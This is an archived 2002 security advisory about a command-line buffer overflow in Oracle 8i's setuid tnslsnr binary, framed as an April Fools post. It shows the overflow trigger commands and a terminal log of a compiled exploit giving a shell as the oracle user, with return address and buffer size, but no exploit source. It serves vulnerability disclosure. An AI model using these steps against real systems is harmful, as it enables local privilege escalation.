Computer Security

Security Advisory: Happy Easter / April Fools from Snosoft (Oracle 8.1.5 tnslsnr)
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Buffer overflow in Oracle 8i TNS Listener

  Advisory CA-2001-16

  [COVERT-2001-04] Vulnerability in Oracle 8i TNS Listener

From:Kevin Finisterre <dotslash_(at)_snosoft.com>
Date:02.04.2002
Subject:Happy Easter / April Fools from Snosoft (Oracle 8.1.5 tnslsnr)

This is ment to be an April fools joke but if you still use old Oracle
its not to funny I guess:

After I ate a few too many hard boiled eggs this weekend I decided to
install Oracle and play with it a little. Being poor I didn't have 800
bones to shell out on Oracle 16i so I had to settle with oldschool
Oracle 8i from this little mom and pop shop on my corner. They just
happened to have a copy that would run on linux and it was only 50
bucks
so I bought it! After the install no more than 10 minutes later I found
an issue... I figured that most anything I would have found would
already be public knowlege or it was patched up somewhere along the way
to the current product version. Well from what I can tell this is an
unknown issue.

TNSLSNR for Linux: Version 8.1.5.0.0 - Production on 01-APR-02 11:46:53

[itchie@ghetto itchie]$ ls -al
/home/u01/app/oracle/product/8.1.5/bin/tnslsnr
-rwsr-s--x    1 oracle   oracle    4399723 Jun 11  1999
/home/u01/app/oracle/product/8.1.5/bin/tnslsnr

There were holes reported on the abuse of $ORACLE_HOME....
http://online.securityfocus.com/archive/1/140704
which tnslsnr had issues with but these appeared patched on this
install
so I didn't bother trying to use env variables as abuse

[dotslash@ghetto itchie]$ export ORACLE_HOME=`perl -e 'print "A" x
9000'`
[dotslash@ghetto itchie]$ /home/u01/app/oracle/product/8.1.5/bin/tnslsnr
(no result...exit normally)

The first thing abnormal I tried hit right on the money... simple
cmdline b0f
[dotslash@ghetto itchie]$
/home/u01/app/oracle/product/8.1.5/bin/tnslsnr
`perl -e 'print "A" x 9000'`
Segmentation fault

Of course I had to give one of my developers a quick ring and try to
harass him to stop molesting the eater bunny and take a second to code
me up an exploit. Much obliged "The Itch" took about 10 minutes
(literally) to come up with the following...

Happy Easter! and April Fools?!

[itchie@ghetto tmp]$ cc -o tnslsnrx tnslsnrx.c
[itchie@ghetto tmp]$ id
uid=507(itchie) gid=507(itchie) groups=507(itchie)
[itchie@ghetto tmp]$ ./tnslsnrx
Oracle tnslsrn 8.1.5
Vulnerability found by KF / http://www.snosoft.com
Coded by The Itch / http://www.promisc.org

Using return address: 0xbffffaf4
Using buffersize    : 2132
sh-2.05$ id
uid=515(oracle) gid=507(itchie) groups=507(itchie)

-KF

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru